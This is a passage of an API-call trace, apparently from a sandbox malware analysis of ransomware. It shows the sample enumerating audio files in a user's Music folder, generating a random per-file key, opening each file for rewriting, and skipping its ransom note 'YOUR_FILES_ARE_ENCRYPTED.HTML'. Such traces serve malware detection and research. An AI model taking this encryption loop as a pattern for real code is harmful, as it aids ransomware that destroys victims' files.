(lpString=".m4a") returned 4 [0124.634] PathFindExtensionW (pszPath="4mkyBkAvmV0qBfY.m4a") returned=".m4a" [0124.634] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\4mkybkavmv0qbfy.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.635] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=54509) returned 1 [0124.635] GetProcessHeap () returned 0x600000 [0124.635] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.635] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="7D") returned 2 [0124.635] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="A3") returned 2 [0124.635] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="29") returned 2 [0124.635] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="5A") returned 2 [0124.635] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="AB") returned 2 [0124.635] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="95") returned 2 [0124.636] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="32") returned 2 [0124.636] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="14") returned 2 [0124.636] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="41") returned 2 [0124.636] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="B9") returned 2 [0124.636] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="D6") returned 2 [0124.636] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="3A") returned 2 [0124.636] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="AF") returned 2 [0124.636] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="80") returned 2 [0124.636] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="0A") returned 2 [0124.636] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="24") returned 2 [0124.636] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="9C") returned 2 [0124.636] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="27") returned 2 [0124.636] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="8C") returned 2 [0124.636] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="DD") returned 2 [0124.636] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="55") returned 2 [0124.636] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="15") returned 2 [0124.636] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="E4") returned 2 [0124.636] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="6C") returned 2 [0124.636] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="A4") returned 2 [0124.636] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="FD") returned 2 [0124.636] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="96") returned 2 [0124.636] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="92") returned 2 [0124.636] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="65") returned 2 [0124.636] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="49") returned 2 [0124.636] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="E7") returned 2 [0124.636] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="50") returned 2 [0124.637] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a" [0124.637] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.637] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.640] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x936d9fe0, ftCreationTime.dwHighDateTime=0x1d70285, ftLastAccessTime.dwLowDateTime=0x99307e50, ftLastAccessTime.dwHighDateTime=0x1d708f9, ftLastWriteTime.dwLowDateTime=0x99307e50, ftLastWriteTime.dwHighDateTime=0x1d708f9, nFileSizeHigh=0x0, nFileSizeLow=0x1219c, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="gL807tElKxoX.m4a", cAlternateFileName="GL807T~1.M4A")) returned 1 [0124.640] StrStrIW (lpFirst="gL807tElKxoX.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.640] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a") returned 84 [0124.640] PathFindExtensionW (pszPath="gL807tElKxoX.m4a") returned=".m4a" [0124.640] lstrlenW (lpString=".m4a") returned 4 [0124.640] PathFindExtensionW (pszPath="gL807tElKxoX.m4a") returned=".m4a" [0124.641] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\gl807telkxox.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.641] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=74140) returned 1 [0124.641] GetProcessHeap () returned 0x600000 [0124.641] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.642] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="6D") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="BD") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="79") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="EC") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="FD") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="B2") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="E8") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="8E") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="EF") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="16") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="33") returned 2 [0124.642] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="09") returned 2 [0124.642] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C4") returned 2 [0124.642] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="44") returned 2 [0124.642] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="C6") returned 2 [0124.642] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="96") returned 2 [0124.642] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="7B") returned 2 [0124.642] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="3E") returned 2 [0124.642] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="F1") returned 2 [0124.642] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="F6") returned 2 [0124.642] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="6A") returned 2 [0124.642] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="37") returned 2 [0124.642] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="0B") returned 2 [0124.642] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="FF") returned 2 [0124.642] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="C5") returned 2 [0124.642] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="02") returned 2 [0124.642] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="64") returned 2 [0124.642] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="D4") returned 2 [0124.642] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="91") returned 2 [0124.642] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="86") returned 2 [0124.643] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="2A") returned 2 [0124.643] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="15") returned 2 [0124.643] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a" [0124.643] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.643] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.646] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x931f8c30, ftCreationTime.dwHighDateTime=0x1d7009e, ftLastAccessTime.dwLowDateTime=0xeca9a600, ftLastAccessTime.dwHighDateTime=0x1d7035a, ftLastWriteTime.dwLowDateTime=0xeca9a600, ftLastWriteTime.dwHighDateTime=0x1d7035a, nFileSizeHigh=0x0, nFileSizeLow=0x4580, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="NmW_RvyyurBlDEVx.wav", cAlternateFileName="NMW_RV~1.WAV")) returned 1 [0124.646] StrStrIW (lpFirst="NmW_RvyyurBlDEVx.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.646] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav") returned 88 [0124.647] PathFindExtensionW (pszPath="NmW_RvyyurBlDEVx.wav") returned=".wav" [0124.647] lstrlenW (lpString=".wav") returned 4 [0124.647] PathFindExtensionW (pszPath="NmW_RvyyurBlDEVx.wav") returned=".wav" [0124.647] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\nmw_rvyyurbldevx.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.647] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=17792) returned 1 [0124.647] GetProcessHeap () returned 0x600000 [0124.647] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.648] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="C8") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="67") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="3C") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="F5") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="CF") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="E6") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="E9") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="00") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="87") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="71") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="4D") returned 2 [0124.648] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="26") returned 2 [0124.648] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="50") returned 2 [0124.648] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="C7") returned 2 [0124.648] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="3D") returned 2 [0124.648] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="C6") returned 2 [0124.648] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="16") returned 2 [0124.648] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="6A") returned 2 [0124.648] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="77") returned 2 [0124.648] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="D8") returned 2 [0124.648] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="38") returned 2 [0124.648] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="BF") returned 2 [0124.648] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="73") returned 2 [0124.648] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="CA") returned 2 [0124.648] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="13") returned 2 [0124.648] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="74") returned 2 [0124.648] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="86") returned 2 [0124.648] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="30") returned 2 [0124.649] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="50") returned 2 [0124.649] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="BE") returned 2 [0124.649] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="14") returned 2 [0124.649] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="1E") returned 2 [0124.649] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav" [0124.649] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.649] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.650] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a6d5540, ftCreationTime.dwHighDateTime=0x1d6faf6, ftLastAccessTime.dwLowDateTime=0x9446bc70, ftLastAccessTime.dwHighDateTime=0x1d709c5, ftLastWriteTime.dwLowDateTime=0x9446bc70, ftLastWriteTime.dwHighDateTime=0x1d709c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="O2hYOTNPDQakLCAg", cAlternateFileName="O2HYOT~1")) returned 1 [0124.652] StrStrIW (lpFirst="O2hYOTNPDQakLCAg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.652] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg") returned 84 [0124.652] GetProcessHeap () returned 0x600000 [0124.652] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0124.656] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg" [0124.656] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\*" [0124.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a6d5540, ftCreationTime.dwHighDateTime=0x1d6faf6, ftLastAccessTime.dwLowDateTime=0x9446bc70, ftLastAccessTime.dwHighDateTime=0x1d709c5, ftLastWriteTime.dwLowDateTime=0x9446bc70, ftLastWriteTime.dwHighDateTime=0x1d709c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x38fb0e3, cFileName=".", cAlternateFileName="")) returned 0x626738 [0124.656] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a6d5540, ftCreationTime.dwHighDateTime=0x1d6faf6, ftLastAccessTime.dwLowDateTime=0x9446bc70, ftLastAccessTime.dwHighDateTime=0x1d709c5, ftLastWriteTime.dwLowDateTime=0x9446bc70, ftLastWriteTime.dwHighDateTime=0x1d709c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x38fb0e3, cFileName="..", cAlternateFileName="")) returned 1 [0124.656] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b3362b0, ftCreationTime.dwHighDateTime=0x1d706a1, ftLastAccessTime.dwLowDateTime=0xcfc44390, ftLastAccessTime.dwHighDateTime=0x1d70a4b, ftLastWriteTime.dwLowDateTime=0xcfc44390, ftLastWriteTime.dwHighDateTime=0x1d70a4b, nFileSizeHigh=0x0, nFileSizeLow=0x1e20, dwReserved0=0x19e638, dwReserved1=0x38fb0e3, cFileName="-hq3- Z8.wav", cAlternateFileName="-HQ3-Z~1.WAV")) returned 1 [0124.656] StrStrIW (lpFirst="-hq3- Z8.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.656] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav") returned 97 [0124.656] PathFindExtensionW (pszPath="-hq3- Z8.wav") returned=".wav" [0124.656] lstrlenW (lpString=".wav") returned 4 [0124.656] PathFindExtensionW (pszPath="-hq3- Z8.wav") returned=".wav" [0124.656] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\r5r-my iy_mo5vx\\o2hyotnpdqaklcag\\-hq3- z8.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.657] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=7712) returned 1 [0124.657] GetProcessHeap () returned 0x600000 [0124.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.660] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="8F") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="0A") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="01") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="01") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="B0") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="C0") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="85") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="3C") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="A9") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="EF") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="05") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="E5") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="1E") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="6C") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="99") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="C7") returned 2 [0124.660] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="59") returned 2 [0124.660] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="A1") returned 2 [0124.660] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="7E") returned 2 [0124.666] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="A2") returned 2 [0124.666] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="90") returned 2 [0124.668] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="DA") returned 2 [0124.668] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="0C") returned 2 [0124.668] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="41") returned 2 [0124.668] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="70") returned 2 [0124.668] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="4E") returned 2 [0124.668] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="0D") returned 2 [0124.668] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="DB") returned 2 [0124.668] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="0E") returned 2 [0124.668] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="66") returned 2 [0124.668] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="7F") returned 2 [0124.668] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="0C") returned 2 [0124.668] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\-hq3- Z8.wav" [0124.668] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.668] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.673] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca53990, ftCreationTime.dwHighDateTime=0x1d70049, ftLastAccessTime.dwLowDateTime=0xc8ce4d50, ftLastAccessTime.dwHighDateTime=0x1d7058d, ftLastWriteTime.dwLowDateTime=0xc8ce4d50, ftLastWriteTime.dwHighDateTime=0x1d7058d, nFileSizeHigh=0x0, nFileSizeLow=0x9a7, dwReserved0=0x19e638, dwReserved1=0x38fb0e3, cFileName="N1HKAQQ4Fz9a.m4a", cAlternateFileName="N1HKAQ~1.M4A")) returned 1 [0124.673] StrStrIW (lpFirst="N1HKAQQ4Fz9a.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.673] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\O2hYOTNPDQakLCAg\\N1HKAQQ4Fz9a.m4a") returned 101 [0124.673] PathFindExtensionW (pszPath="N1HKAQQ4Fz9a.m4a") returned=".m4a" [0124.673] lstrlenW (lpString=".m4a") returned 4 [0124.674] PathFindExtensionW (pszPath="N1HKAQQ4Fz9a.m4a") returned=".m4a" [0124.674] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: 